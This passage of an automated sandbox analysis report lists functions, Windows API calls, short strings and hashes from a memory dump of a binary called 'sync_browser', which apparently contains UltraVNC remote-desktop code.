Instruction Fuzzy Hash: CF211D32618B5187E714AB69E44466EB7A0FB88B54FD01132EA9E83BA4DF3DD4448B10

Function 00007FF7D59A1660 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00007FF7D59A16AC
GlobalFree.KERNEL32 ref: 00007FF7D59A16C5
GlobalUnlock.KERNEL32 ref: 00007FF7D59A1704
GlobalFree.KERNEL32 ref: 00007FF7D59A171D

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Global$FreeUnlock
String ID:
API String ID: 1239146723-0
Opcode ID: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
Instruction ID: c2896441f02d98c76fa5aa4583c2c83c24558d91ccc78dafa0a80f4aa8487a60
Opcode Fuzzy Hash: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
Instruction Fuzzy Hash: 5A214C31A19A6187EB44AF25F85056CA6A4FFC4F88FC80037ED8E83658CFBCD4518760

Function 00007FF7D5983690 Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

OutputDebugStringA.KERNEL32(?,?,?,?,?,00007FF7D598385F), ref: 00007FF7D59836A9
GetStdHandle.KERNEL32(?,?,?,?,?,00007FF7D598385F), ref: 00007FF7D59836D1
WriteConsoleA.KERNEL32 ref: 00007FF7D59836EE
WriteFile.KERNEL32(?,?,?,?,?,00007FF7D598385F), ref: 00007FF7D5983725

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Write$ConsoleDebugFileHandleOutputString
String ID:
API String ID: 1934604790-0
Opcode ID: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
Instruction ID: c2ee2d5b2b4db487e10f67839ee38c6a3ba53ebdd514d86bd0375de8397ccae3
Opcode Fuzzy Hash: aa49c59b5da7e2634850ce4aacb17eb8463b37466091e8bd9ee96f81ef6cd0f2
Instruction Fuzzy Hash: 2011D065619A9042E740AB39A40476DEB60EB85FF4F984326DFB903BD8CF3DC4458300

Function 00007FF7D59F4FA8 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF7D59F4FB2

Part of subcall function 00007FF7D59F3848: _amsg_exit.LIBCMT ref: 00007FF7D59F385E

_lock.LIBCMT ref: 00007FF7D59F4FE0
free.LIBCMT ref: 00007FF7D59F5016
_amsg_exit.LIBCMT ref: 00007FF7D59F504F

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _amsg_exit$_getptd_lockfree
String ID:
API String ID: 2148533958-0
Opcode ID: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
Instruction ID: 0e79f40c1105d8afd15ba2683db7f0a34b6aeae1d4be6417a658d53f77ca767d
Opcode Fuzzy Hash: 67261a7475787b32431de27056b085c578b22756a177dc977607e34beed0a1e5
Instruction Fuzzy Hash: BE11E722A2964183EA98AB50E4407BDA660FF84F88FC85037EE0D03696DF3CE4558761

Function 00007FF7D59592C0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D59592F0

Part of subcall function 00007FF7D59C7520: EnterCriticalSection.KERNEL32 ref: 00007FF7D59C7534
Part of subcall function 00007FF7D59C7520: ReleaseSemaphore.KERNEL32 ref: 00007FF7D59C7577
Part of subcall function 00007FF7D59C7520: GetLastError.KERNEL32 ref: 00007FF7D59C7581
Part of subcall function 00007FF7D59C7520: LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C758C

Part of subcall function 00007FF7D59C7400: EnterCriticalSection.KERNEL32 ref: 00007FF7D59C7427
Part of subcall function 00007FF7D59C7400: LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C7472
Part of subcall function 00007FF7D59C7400: LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C747B
Part of subcall function 00007FF7D59C7400: WaitForSingleObject.KERNEL32 ref: 00007FF7D59C748A
Part of subcall function 00007FF7D59C7400: EnterCriticalSection.KERNEL32 ref: 00007FF7D59C7495
Part of subcall function 00007FF7D59C7400: GetLastError.KERNEL32 ref: 00007FF7D59C74A7
Part of subcall function 00007FF7D59C7400: EnterCriticalSection.KERNEL32 ref: 00007FF7D59C74DE
Part of subcall function 00007FF7D59C7400: LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C7500

Strings

vncclient.cpp : enable/disable synced, xrefs: 00007FF7D595935C
b, xrefs: 00007FF7D59592E5
vncclient.cpp : disable update thread, xrefs: 00007FF7D5959321

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$Leave$ErrorLast$ObjectReleaseSemaphoreSingleWait
String ID: b$vncclient.cpp : disable update thread$vncclient.cpp : enable/disable synced
API String ID: 1962697109-2518527632
Opcode ID: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
Instruction ID: eb192f8062193b54965ea4eda9cfa8acf4d12044491bd0cdc93acda1cb15abd7
Opcode Fuzzy Hash: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
Instruction Fuzzy Hash: C5114F31A18A8286EB04AF25D4506BDA761FF84FA8FC84236DE5E476E9DF3CD504C760

Function 00007FF7D59C79A0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D59C79C7
LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C79E9
CreateSemaphoreA.KERNEL32 ref: 00007FF7D59C7A03
GetLastError.KERNEL32 ref: 00007FF7D59C7A15

Part of subcall function 00007FF7D59F2950: RaiseException.KERNEL32 ref: 00007FF7D59F29CB

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$CreateEnterErrorExceptionLastLeaveRaiseSemaphore
String ID:
API String ID: 1747828912-0
Opcode ID: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
Instruction ID: 1956cbdc35fe23ac20caf305c231001998988d41a61966f5be3af3cacf0a030a
Opcode Fuzzy Hash: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
Instruction Fuzzy Hash: 2B115E72A2476297E7089F25E58056DBBA4FB88F90F90413BEB4943B54CF38E075CB50

Function 00007FF7D59C7520 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D59C7534
ReleaseSemaphore.KERNEL32 ref: 00007FF7D59C7577
GetLastError.KERNEL32 ref: 00007FF7D59C7581
LeaveCriticalSection.KERNEL32 ref: 00007FF7D59C758C

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
String ID:
API String ID: 540623443-0
Opcode ID: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
Instruction ID: fcf4d7bd586ddd221bed2c0c68a9a29e4b2ed3315c853ae5df3fa9f339f9ae23
Opcode Fuzzy Hash: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
Instruction Fuzzy Hash: D2113022A28A5587DB84EF65D5806BCB3A4FF88F88FC05036EE4E57654DF38D055C710

Function 00007FF7D5949570 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7D594957C
ExtEscape.GDI32 ref: 00007FF7D594959E
ExtEscape.GDI32 ref: 00007FF7D59495BB
ReleaseDC.USER32 ref: 00007FF7D59495C6

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Escape$Release
String ID:
API String ID: 2350829361-0
Opcode ID: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
Instruction ID: 73ccaa57763552d8c346daab7f8245911b6ad7127fd3c8b55883c9da7af37b00
Opcode Fuzzy Hash: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
Instruction Fuzzy Hash: 6EF06D32B286518BE7649B34B955A2EF6A1FBC8B84F944136DE4A03E18CE3CD0118B04

Function 00007FF7D59F5878 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF7D59F587E

Part of subcall function 00007FF7D59F3848: _amsg_exit.LIBCMT ref: 00007FF7D59F385E

_getptd.LIBCMT ref: 00007FF7D59F589E
_lock.LIBCMT ref: 00007FF7D59F58B1
_amsg_exit.LIBCMT ref: 00007FF7D59F58DF

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _amsg_exit_getptd$_lock
String ID:
API String ID: 3670291111-0
Opcode ID: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
Instruction ID: a78f9c97d494d13f2617831e8ba952a5410dcd3d6f5df83be91674266d558bb3
Opcode Fuzzy Hash: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
Instruction Fuzzy Hash: 9AF0E761E1A04697FA58BB61D441BBC9660AF54F58FD80176EE0C072D2DF2CA844D721

Function 00007FF7D593AED0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 00007FF7D593B015

Strings

., xrefs: 00007FF7D593AF50
., xrefs: 00007FF7D593AFC0

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: htonl
String ID: .$.
API String ID: 2009864989-3769392785
Opcode ID: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
Instruction ID: 6cf1cc8707a72c511c0b78cab4bc11a1e1722bcdf7dcb49e6e0a184761db146e
Opcode Fuzzy Hash: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
Instruction Fuzzy Hash: B641C151A0C2828BF725BA32985017EFAD09F51F5CFD86073EE6A862CACF3CD4058320

Function 00007FF7D595C090 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D59EA220: _errno.LIBCMT ref: 00007FF7D59EA168
Part of subcall function 00007FF7D59EA220: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59EA173

GlobalAlloc.KERNEL32 ref: 00007FF7D595C1AE
DeleteFileA.KERNEL32 ref: 00007FF7D595C1D6

Strings

!UVNCDIR-, xrefs: 00007FF7D595C0CF

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: AllocDeleteFileGlobal_errno_invalid_parameter_noinfo
String ID: !UVNCDIR-
API String ID: 2642416944-2720985186
Opcode ID: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
Instruction ID: 02fe51dac09bd54c4d7bd31645cda148bf76d5d83f3cf4a29acaef122e95720c
Opcode Fuzzy Hash: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
Instruction Fuzzy Hash: A941B42161DAC182EB26AB20A5143FDA790FB89B84FC44132DE9D477C6DF3CD516C720

Function 00007FF7D59E9748 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7D59E9789
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E9794

Strings

B, xrefs: 00007FF7D59E97AB

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
Instruction ID: 51835faa3753e52a2ea9de807875392a2fb38b5e7a28b471219c2a6d85f31df0
Opcode Fuzzy Hash: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
Instruction Fuzzy Hash: FB316D32A196268AF711EF75A4405ACB7B4BB08BACFD84137EE1D53A99CF39D445C320

Function 00007FF7D59F4AFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7D59F4B3D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59F4B48

Strings

SecureVNC;0;0x%08x;%s, xrefs: 00007FF7D59F4B0B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: SecureVNC;0;0x%08x;%s
API String ID: 2959964966-2465057312
Opcode ID: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
Instruction ID: f5e589dde085f7ba520d60da8d05c480a9fdacfb6471a84075e43c449b88dc1e
Opcode Fuzzy Hash: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
Instruction Fuzzy Hash: 54219332B187518AE711EF61A8405ADB7A9BB08FACBD50137EE5C53B89CF39D441C760

Function 00007FF7D5942FE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7D5943009
SetCurrentDirectoryA.KERNEL32 ref: 00007FF7D5943041

Strings

" -service, xrefs: 00007FF7D59430BF

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
